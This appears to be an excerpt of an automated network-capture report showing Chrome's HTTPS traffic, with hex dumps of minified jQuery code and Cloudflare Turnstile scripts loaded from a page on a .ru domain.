                                                                            2024-12-19 14:36:19 UTC16384INData Raw: 2c 64 5d 3b 62 72 65 61 6b 7d 7d 65 6c 73 65 20 69 66 28 70 26 26 28 64 3d 73 3d 28 72 3d 28 69 3d 28 6f 3d 28 61 3d 65 29 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c 7c 28 6f 5b 61 2e 75 6e 69 71 75 65 49 44 5d 3d 7b 7d 29 29 5b 68 5d 7c 7c 5b 5d 29 5b 30 5d 3d 3d 3d 6b 26 26 72 5b 31 5d 29 2c 21 31 3d 3d 3d 64 29 77 68 69 6c 65 28 61 3d 2b 2b 73 26 26 61 26 26 61 5b 6c 5d 7c 7c 28 64 3d 73 3d 30 29 7c 7c 75 2e 70 6f 70 28 29 29 69 66 28 28 78 3f 61 2e 6e 6f 64 65 4e 61 6d 65 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 3d 3d 3d 66 3a 31 3d 3d 3d 61 2e 6e 6f 64 65 54 79 70 65 29 26 26 2b 2b 64 26 26 28 70 26 26 28 28 69 3d 28 6f 3d 61 5b 53 5d 7c 7c 28 61 5b 53 5d 3d 7b 7d 29 29 5b 61 2e 75 6e 69 71 75 65 49 44 5d 7c
                                                                            Data Ascii: ,d];break}}else if(p&&(d=s=(r=(i=(o=(a=e)[S]||(a[S]={}))[a.uniqueID]||(o[a.uniqueID]={}))[h]||[])[0]===k&&r[1]),!1===d)while(a=++s&&a&&a[l]||(d=s=0)||u.pop())if((x?a.nodeName.toLowerCase()===f:1===a.nodeType)&&++d&&(p&&((i=(o=a[S]||(a[S]={}))[a.uniqueID]|
                                                                            2024-12-19 14:36:19 UTC16384INData Raw: 22 6d 73 2d 22 29 2e 72 65 70 6c 61 63 65 28 7a 2c 55 29 7d 76 61 72 20 56 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 39 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7c 7c 21 2b 65 2e 6e 6f 64 65 54 79 70 65 7d 3b 66 75 6e 63 74 69 6f 6e 20 47 28 29 7b 74 68 69 73 2e 65 78 70 61 6e 64 6f 3d 53 2e 65 78 70 61 6e 64 6f 2b 47 2e 75 69 64 2b 2b 7d 47 2e 75 69 64 3d 31 2c 47 2e 70 72 6f 74 6f 74 79 70 65 3d 7b 63 61 63 68 65 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3b 72 65 74 75 72 6e 20 74 7c 7c 28 74 3d 7b 7d 2c 56 28 65 29 26 26 28 65 2e 6e 6f 64 65 54 79 70 65 3f 65 5b 74 68 69 73 2e 65 78 70 61 6e 64 6f 5d 3d 74 3a 4f 62 6a 65 63 74 2e
                                                                            Data Ascii: "ms-").replace(z,U)}var V=function(e){return 1===e.nodeType||9===e.nodeType||!+e.nodeType};function G(){this.expando=S.expando+G.uid++}G.uid=1,G.prototype={cache:function(e){var t=e[this.expando];return t||(t={},V(e)&&(e.nodeType?e[this.expando]=t:Object.
                                                                            2024-12-19 14:36:19 UTC16384INData Raw: 72 5d 29 3b 65 6c 73 65 20 4c 65 28 65 2c 63 29 3b 72 65 74 75 72 6e 20 30 3c 28 61 3d 76 65 28 63 2c 22 73 63 72 69 70 74 22 29 29 2e 6c 65 6e 67 74 68 26 26 79 65 28 61 2c 21 66 26 26 76 65 28 65 2c 22 73 63 72 69 70 74 22 29 29 2c 63 7d 2c 63 6c 65 61 6e 44 61 74 61 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 66 6f 72 28 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 53 2e 65 76 65 6e 74 2e 73 70 65 63 69 61 6c 2c 6f 3d 30 3b 76 6f 69 64 20 30 21 3d 3d 28 6e 3d 65 5b 6f 5d 29 3b 6f 2b 2b 29 69 66 28 56 28 6e 29 29 7b 69 66 28 74 3d 6e 5b 59 2e 65 78 70 61 6e 64 6f 5d 29 7b 69 66 28 74 2e 65 76 65 6e 74 73 29 66 6f 72 28 72 20 69 6e 20 74 2e 65 76 65 6e 74 73 29 69 5b 72 5d 3f 53 2e 65 76 65 6e 74 2e 72 65 6d 6f 76 65 28 6e 2c 72 29 3a 53 2e 72 65 6d 6f 76 65 45 76 65
                                                                            Data Ascii: r]);else Le(e,c);return 0<(a=ve(c,"script")).length&&ye(a,!f&&ve(e,"script")),c},cleanData:function(e){for(var t,n,r,i=S.event.special,o=0;void 0!==(n=e[o]);o++)if(V(n)){if(t=n[Y.expando]){if(t.events)for(r in t.events)i[r]?S.event.remove(n,r):S.removeEve
                                                                            2024-12-19 14:36:19 UTC16384INData Raw: 53 2e 65 78 74 65 6e 64 28 7b 61 74 74 72 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 2c 6f 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 33 21 3d 3d 6f 26 26 38 21 3d 3d 6f 26 26 32 21 3d 3d 6f 29 72 65 74 75 72 6e 22 75 6e 64 65 66 69 6e 65 64 22 3d 3d 74 79 70 65 6f 66 20 65 2e 67 65 74 41 74 74 72 69 62 75 74 65 3f 53 2e 70 72 6f 70 28 65 2c 74 2c 6e 29 3a 28 31 3d 3d 3d 6f 26 26 53 2e 69 73 58 4d 4c 44 6f 63 28 65 29 7c 7c 28 69 3d 53 2e 61 74 74 72 48 6f 6f 6b 73 5b 74 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 5d 7c 7c 28 53 2e 65 78 70 72 2e 6d 61 74 63 68 2e 62 6f 6f 6c 2e 74 65 73 74 28 74 29 3f 63 74 3a 76 6f 69 64 20 30 29 29 2c 76 6f 69 64 20 30 21 3d 3d 6e 3f 6e 75 6c 6c 3d 3d 3d 6e 3f 76 6f 69 64 20 53 2e 72 65 6d
                                                                            Data Ascii: S.extend({attr:function(e,t,n){var r,i,o=e.nodeType;if(3!==o&&8!==o&&2!==o)return"undefined"==typeof e.getAttribute?S.prop(e,t,n):(1===o&&S.isXMLDoc(e)||(i=S.attrHooks[t.toLowerCase()]||(S.expr.match.bool.test(t)?ct:void 0)),void 0!==n?null===n?void S.rem


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            7192.168.2.1749726104.18.94.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:20 UTC383OUTGET /turnstile/v0/b/787bc399e22f/api.js HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: */*
                                                                            Sec-Fetch-Site: none
                                                                            Sec-Fetch-Mode: cors
                                                                            Sec-Fetch-Dest: empty
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:20 UTC471INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:36:20 GMT
                                                                            Content-Type: application/javascript; charset=UTF-8
                                                                            Content-Length: 47692
                                                                            Connection: close
                                                                            accept-ranges: bytes
                                                                            last-modified: Tue, 10 Dec 2024 17:31:41 GMT
                                                                            cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public
                                                                            access-control-allow-origin: *
                                                                            cross-origin-resource-policy: cross-origin
                                                                            Server: cloudflare
                                                                            CF-RAY: 8f481fd3eb7942f2-EWR
                                                                            alt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:36:20 UTC898INData Raw: 22 75 73 65 20 73 74 72 69 63 74 22 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 48 74 28 65 2c 72 2c 6e 2c 6f 2c 63 2c 75 2c 67 29 7b 74 72 79 7b 76 61 72 20 68 3d 65 5b 75 5d 28 67 29 2c 6c 3d 68 2e 76 61 6c 75 65 7d 63 61 74 63 68 28 70 29 7b 6e 28 70 29 3b 72 65 74 75 72 6e 7d 68 2e 64 6f 6e 65 3f 72 28 6c 29 3a 50 72 6f 6d 69 73 65 2e 72 65 73 6f 6c 76 65 28 6c 29 2e 74 68 65 6e 28 6f 2c 63 29 7d 66 75 6e 63 74 69 6f 6e 20 42 74 28 65 29 7b 72 65 74 75 72 6e 20 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 72 3d 74 68 69 73 2c 6e 3d 61 72 67 75 6d 65 6e 74 73 3b 72 65 74 75 72 6e 20 6e 65 77 20 50 72 6f 6d 69 73 65 28 66 75 6e 63 74 69 6f 6e 28 6f 2c 63 29 7b 76 61 72 20 75 3d 65 2e 61 70 70 6c 79 28 72 2c 6e 29 3b 66 75 6e 63 74
                                                                            Data Ascii: "use strict";(function(){function Ht(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Bt(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);funct
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 20 65 7d 66 75 6e 63 74 69 6f 6e 20 53 72 28 65 2c 72 29 7b 76 61 72 20 6e 3d 4f 62 6a 65 63 74 2e 6b 65 79 73 28 65 29 3b 69 66 28 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 29 7b 76 61 72 20 6f 3d 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 53 79 6d 62 6f 6c 73 28 65 29 3b 72 26 26 28 6f 3d 6f 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 63 29 7b 72 65 74 75 72 6e 20 4f 62 6a 65 63 74 2e 67 65 74 4f 77 6e 50 72 6f 70 65 72 74 79 44 65 73 63 72 69 70 74 6f 72 28 65 2c 63 29 2e 65 6e 75 6d 65 72 61 62 6c 65 7d 29 29 2c 6e 2e 70 75 73 68 2e 61 70 70 6c 79 28 6e 2c 6f 29 7d 72 65 74 75 72 6e 20 6e 7d 66 75 6e 63 74 69 6f 6e 20 6e 74 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 72 3d 72 21 3d 6e 75
                                                                            Data Ascii: e}function Sr(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=nu
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 72 61 79 24 2f 2e 74 65 73 74 28 6e 29 29 72 65 74 75 72 6e 20 61 74 28 65 2c 72 29 7d 7d 66 75 6e 63 74 69 6f 6e 20 41 65 28 65 2c 72 29 7b 72 65 74 75 72 6e 20 6a 74 28 65 29 7c 7c 71 74 28 65 2c 72 29 7c 7c 47 74 28 65 2c 72 29 7c 7c 7a 74 28 29 7d 66 75 6e 63 74 69 6f 6e 20 46 28 65 29 7b 22 40 73 77 63 2f 68 65 6c 70 65 72 73 20 2d 20 74 79 70 65 6f 66 22 3b 72 65 74 75 72 6e 20 65 26 26 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 21 3d 22 75 6e 64 65 66 69 6e 65 64 22 26 26 65 2e 63 6f 6e 73 74 72 75 63 74 6f 72 3d 3d 3d 53 79 6d 62 6f 6c 3f 22 73 79 6d 62 6f 6c 22 3a 74 79 70 65 6f 66 20 65 7d 66 75 6e 63 74 69 6f 6e 20 55 65 28 65 2c 72 29 7b 76 61 72 20 6e 3d 7b 6c 61 62 65 6c 3a 30 2c 73 65 6e 74 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 75 5b 30
                                                                            Data Ascii: ray$/.test(n))return at(e,r)}}function Ae(e,r){return jt(e)||qt(e,r)||Gt(e,r)||zt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 74 69 6f 6e 3a 22 54 75 72 6e 73 74 69 6c 65 27 73 20 61 70 69 2e 6a 73 20 77 61 73 20 6c 6f 61 64 65 64 2c 20 62 75 74 20 74 68 65 20 69 66 72 61 6d 65 20 75 6e 64 65 72 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 6c 6f 61 64 65 64 2e 20 48 61 73 20 74 68 65 20 76 69 73 69 74 6f 72 20 62 6c 6f 63 6b 65 64 20 73 6f 6d 65 20 70 61 72 74 73 20 6f 66 20 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 20 6f 72 20 61 72 65 20 74 68 65 79 20 73 65 6c 66 2d 68 6f 73 74 69 6e 67 20 61 70 69 2e 6a 73 3f 22 7d 3b 76 61 72 20 59 74 3d 33 30 30 30 32 30 3b 76 61 72 20 44 65 3d 33 30 30 30 33 30 3b 76 61 72 20 56 65 3d 33 30 30 30 33 31 3b 76 61 72 20 6a 3b 28 66 75
                                                                            Data Ascii: tion:"Turnstile's api.js was loaded, but the iframe under challenges.cloudflare.com could not be loaded. Has the visitor blocked some parts of challenges.cloudflare.com or are they self-hosting api.js?"};var Yt=300020;var De=300030;var Ve=300031;var j;(fu
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 4a 7c 7c 28 4a 3d 7b 7d 29 29 3b 76 61 72 20 69 65 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 4e 45 56 45 52 3d 22 6e 65 76 65 72 22 2c 65 2e 4d 41 4e 55 41 4c 3d 22 6d 61 6e 75 61 6c 22 2c 65 2e 41 55 54 4f 3d 22 61 75 74 6f 22 7d 29 28 69 65 7c 7c 28 69 65 3d 7b 7d 29 29 3b 76 61 72 20 58 3b 28 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 2e 41 4c 57 41 59 53 3d 22 61 6c 77 61 79 73 22 2c 65 2e 45 58 45 43 55 54 45 3d 22 65 78 65 63 75 74 65 22 2c 65 2e 49 4e 54 45 52 41 43 54 49 4f 4e 5f 4f 4e 4c 59 3d 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 7d 29 28 58 7c 7c 28 58 3d 7b 7d 29 29 3b 76 61 72 20 70 65 3b 28 66 75
                                                                            Data Ascii: ="never",e.MANUAL="manual",e.AUTO="auto"})(J||(J={}));var ie;(function(e){e.NEVER="never",e.MANUAL="manual",e.AUTO="auto"})(ie||(ie={}));var X;(function(e){e.ALWAYS="always",e.EXECUTE="execute",e.INTERACTION_ONLY="interaction-only"})(X||(X={}));var pe;(fu
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 65 3d 3d 3d 22 61 75 74 6f 22 7c 7c 4e 72 2e 74 65 73 74 28 65 29 7d 66 75 6e 63 74 69 6f 6e 20 67 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 61 6c 77 61 79 73 22 2c 22 65 78 65 63 75 74 65 22 2c 22 69 6e 74 65 72 61 63 74 69 6f 6e 2d 6f 6e 6c 79 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 51 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 74 72 75 65 22 2c 22 66 61 6c 73 65 22 5d 2c 65 29 7d 66 75 6e 63 74 69 6f 6e 20 79 74 28 65 29 7b 72 65 74 75 72 6e 20 4d 28 5b 22 72 65 6e 64 65 72 22 2c 22 65 78 65 63 75 74 65 22 5d 2c 65 29 7d 76 61 72 20 24 74 3d 33 30 30 2c 4a 74 3d 31 30 3b 66 75 6e 63 74 69 6f 6e 20 68 74 28 65 29 7b 76 61 72 20 72 3d 6e 65 77 20 55 52 4c 53 65 61 72 63 68 50 61 72 61 6d 73 3b 69 66 28 65 2e 70 61 72 61 6d 73 2e 5f 64 65
                                                                            Data Ascii: e==="auto"||Nr.test(e)}function gt(e){return M(["always","execute","interaction-only"],e)}function Qt(e){return M(["true","false"],e)}function yt(e){return M(["render","execute"],e)}var $t=300,Jt=10;function ht(e){var r=new URLSearchParams;if(e.params._de
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 2f 72 63 76 22 29 2e 63 6f 6e 63 61 74 28 6f 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 72 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 74 68 65 6d 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 45 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 73 69 7a 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 6e 2e 6c 61 6e 67 75 61 67 65 2c 22 2f 22 29 2e 63 6f 6e 63 61 74 28 70 29 7d 76 61 72 20 52 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 72 2c 6e 2c 6f 3d 77 69 6e 64 6f 77 2e 69 6e 6e 65 72 57 69 64 74 68 3c 34 30 30 2c 63 3d 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 46 45 45 44 42 41 43 4b 7c 7c 65 2e 73 74 61 74 65 3d 3d 3d 53 65 2e 46 41 49 4c 55 52 45 5f 48 41 56 49 4e 47 5f 54 52 4f 55 42 4c 45 53
                                                                            Data Ascii: /rcv").concat(o,"/").concat(e,"/").concat(r,"/").concat(n.theme,"/").concat(E,"/").concat(n.size,"/").concat(n.language,"/").concat(p)}var Rt=function(e){var r,n,o=window.innerWidth<400,c=e.state===Se.FAILURE_FEEDBACK||e.state===Se.FAILURE_HAVING_TROUBLES
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 7c 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 2e 73 68 61 6d 29 72 65 74 75 72 6e 21 31 3b 69 66 28 74 79 70 65 6f 66 20 50 72 6f 78 79 3d 3d 22 66 75 6e 63 74 69 6f 6e 22 29 72 65 74 75 72 6e 21 30 3b 74 72 79 7b 72 65 74 75 72 6e 20 42 6f 6f 6c 65 61 6e 2e 70 72 6f 74 6f 74 79 70 65 2e 76 61 6c 75 65 4f 66 2e 63 61 6c 6c 28 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 28 42 6f 6f 6c 65 61 6e 2c 5b 5d 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 29 29 2c 21 30 7d 63 61 74 63 68 28 65 29 7b 72 65 74 75 72 6e 21 31 7d 7d 66 75 6e 63 74 69 6f 6e 20 49 65 28 65 2c 72 2c 6e 29 7b 72 65 74 75 72 6e 20 6a 65 28 29 3f 49 65 3d 52 65 66 6c 65 63 74 2e 63 6f 6e 73 74 72 75 63 74 3a 49 65 3d 66 75 6e 63 74 69 6f 6e 28 63 2c 75 2c 67 29 7b 76 61 72 20 68 3d
                                                                            Data Ascii: |Reflect.construct.sham)return!1;if(typeof Proxy=="function")return!0;try{return Boolean.prototype.valueOf.call(Reflect.construct(Boolean,[],function(){})),!0}catch(e){return!1}}function Ie(e,r,n){return je()?Ie=Reflect.construct:Ie=function(c,u,g){var h=
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 29 3b 76 61 72 20 75 3b 72 65 74 75 72 6e 20 75 3d 72 2e 63 61 6c 6c 28 74 68 69 73 2c 6f 29 2c 4d 65 28 42 65 28 75 29 2c 22 63 6f 64 65 22 2c 76 6f 69 64 20 30 29 2c 75 2e 6e 61 6d 65 3d 22 54 75 72 6e 73 74 69 6c 65 45 72 72 6f 72 22 2c 75 2e 63 6f 64 65 3d 63 2c 75 7d 72 65 74 75 72 6e 20 6e 7d 28 71 65 28 45 72 72 6f 72 29 29 3b 66 75 6e 63 74 69 6f 6e 20 6d 28 65 2c 72 29 7b 76 61 72 20 6e 3d 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 2c 22 2e 22 29 3b 74 68 72 6f 77 20 6e 65 77 20 64 72 28 6e 2c 72 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 65 29 7b 63 6f 6e 73 6f 6c 65 2e 77 61 72 6e 28 22 5b 43 6c 6f 75 64 66 6c 61 72 65 20 54 75 72 6e 73 74 69 6c 65 5d 20 22 2e 63 6f 6e 63 61 74 28 65 29 29
                                                                            Data Ascii: );var u;return u=r.call(this,o),Me(Be(u),"code",void 0),u.name="TurnstileError",u.code=c,u}return n}(qe(Error));function m(e,r){var n="[Cloudflare Turnstile] ".concat(e,".");throw new dr(n,r)}function b(e){console.warn("[Cloudflare Turnstile] ".concat(e))
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 22 64 69 76 22 29 3b 6c 2e 73 74 79 6c 65 2e 70 6f 73 69 74 69 6f 6e 3d 22 66 69 78 65 64 22 2c 6c 2e 73 74 79 6c 65 2e 7a 49 6e 64 65 78 3d 22 32 31 34 37 34 38 33 36 34 36 22 2c 6c 2e 73 74 79 6c 65 2e 77 69 64 74 68 3d 22 31 30 30 76 77 22 2c 6c 2e 73 74 79 6c 65 2e 68 65 69 67 68 74 3d 22 31 30 30 76 68 22 2c 6c 2e 73 74 79 6c 65 2e 74 6f 70 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 6c 65 66 74 3d 22 30 22 2c 6c 2e 73 74 79 6c 65 2e 74 72 61 6e 73 66 6f 72 6d 4f 72 69 67 69 6e 3d 22 63 65 6e 74 65 72 20 63 65 6e 74 65 72 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 58 3d 22 68 69 64 64 65 6e 22 2c 6c 2e 73 74 79 6c 65 2e 6f 76 65 72 66 6c 6f 77 59 3d 22 61 75 74 6f 22 2c 6c 2e 73 74 79 6c 65
                                                                            Data Ascii: ent.createElement("div");l.style.position="fixed",l.style.zIndex="2147483646",l.style.width="100vw",l.style.height="100vh",l.style.top="0",l.style.left="0",l.style.transformOrigin="center center",l.style.overflowX="hidden",l.style.overflowY="auto",l.style


                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                            8192.168.2.1749727104.18.95.414436604C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            TimestampBytes transferredDirectionData
                                                                            2024-12-19 14:36:20 UTC797OUTGET /cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv/g1eg9/0x4AAAAAAA01zeNo8XyUDmXH/auto/fbE/normal/auto/ HTTP/1.1
                                                                            Host: challenges.cloudflare.com
                                                                            Connection: keep-alive
                                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                            sec-ch-ua-mobile: ?0
                                                                            sec-ch-ua-platform: "Windows"
                                                                            Upgrade-Insecure-Requests: 1
                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                            Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                            Sec-Fetch-Site: cross-site
                                                                            Sec-Fetch-Mode: navigate
                                                                            Sec-Fetch-Dest: iframe
                                                                            Referer: https://gs.quantumdhub.ru/
                                                                            Accept-Encoding: gzip, deflate, br
                                                                            Accept-Language: en-US,en;q=0.9
                                                                            2024-12-19 14:36:20 UTC1362INHTTP/1.1 200 OK
                                                                            Date: Thu, 19 Dec 2024 14:36:20 GMT
                                                                            Content-Type: text/html; charset=UTF-8
                                                                            Content-Length: 26678
                                                                            Connection: close
                                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                            permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                                                            content-security-policy: frame-src https://challenges.cloudflare.com/; base-uri 'self'
                                                                            cross-origin-embedder-policy: require-corp
                                                                            cross-origin-opener-policy: same-origin
                                                                            cross-origin-resource-policy: cross-origin
                                                                            origin-agent-cluster: ?1
                                                                            accept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                            critical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                                                            referrer-policy: same-origin
                                                                            document-policy: js-profiling
                                                                            2024-12-19 14:36:20 UTC82INData Raw: 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 34 38 31 66 64 34 31 38 33 34 34 32 61 66 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                            Data Ascii: Server: cloudflareCF-RAY: 8f481fd4183442af-EWRalt-svc: h3=":443"; ma=86400
                                                                            2024-12-19 14:36:20 UTC1294INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 2c 63 68 72 6f 6d 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 20 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 22 3e 0a
                                                                            Data Ascii: <!DOCTYPE HTML><html lang="en-US"><head> <meta http-equiv="X-UA-Compatible" content="IE=Edge,chrome=1"> <meta name="robots" content="noindex, nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
                                                                            2024-12-19 14:36:20 UTC1369INData Raw: 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 31 30 30 25 7d 2e 6d 61 69 6e 2d 77 72 61 70 70 65 72 2c 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 33 32 33 32 33 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 73 79 73 74 65 6d 2d 75 69 2c 62 6c 69 6e 6b 6d 61 63 73 79 73 74 65 6d 66 6f 6e 74 2c 53 65 67 6f 65 20 55 49 2c 72 6f 62 6f 74 6f 2c 6f 78 79 67 65 6e 2c 75 62 75 6e 74 75 2c 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 2c 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 2d 77 65 62 6b 69 74 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65
                                                                            Data Ascii: dding:0;width:100%}.main-wrapper,body{background-color:#fff;color:#232323;font-family:-apple-system,system-ui,blinkmacsystemfont,Segoe UI,roboto,oxygen,ubuntu,Helvetica Neue,arial,sans-serif;font-size:14px;font-weight:400;-webkit-font-smoothing:antialiase
